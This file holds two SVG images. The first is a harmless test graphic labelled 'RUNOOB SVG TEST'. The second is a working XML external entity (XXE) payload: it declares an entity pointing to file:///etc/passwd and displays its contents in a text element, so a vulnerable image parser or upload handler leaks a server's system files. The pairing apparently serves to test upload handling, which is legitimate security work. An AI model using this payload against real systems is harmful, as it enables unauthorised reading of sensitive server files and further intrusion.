<svg version="1.1"
baseProfile="full"
width="300" height="200"
xmlns="http://www.w3.org/2000/svg">
<rect width="100%" height="100%" stroke="red" stroke-width="4" fill="yellow" />
<circle cx="150" cy="100" r="80" fill="green" />
<text x="150" y="115" font-size="16" text-anchor="middle" fill="white">RUNOOB SVG TEST</text>
</svg>
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg [
<!ELEMENT svg ANY >
<!ENTITY evil SYSTEM "file:///etc/passwd" >]>
<svg version="1.1"
baseProfile="full"
width="3000" height="2000"
xmlns="http://www.w3.org/2000/svg">
<text x="1500" y="1150" font-size="16" text-anchor="middle" fill="red">&evil;</text>
</svg>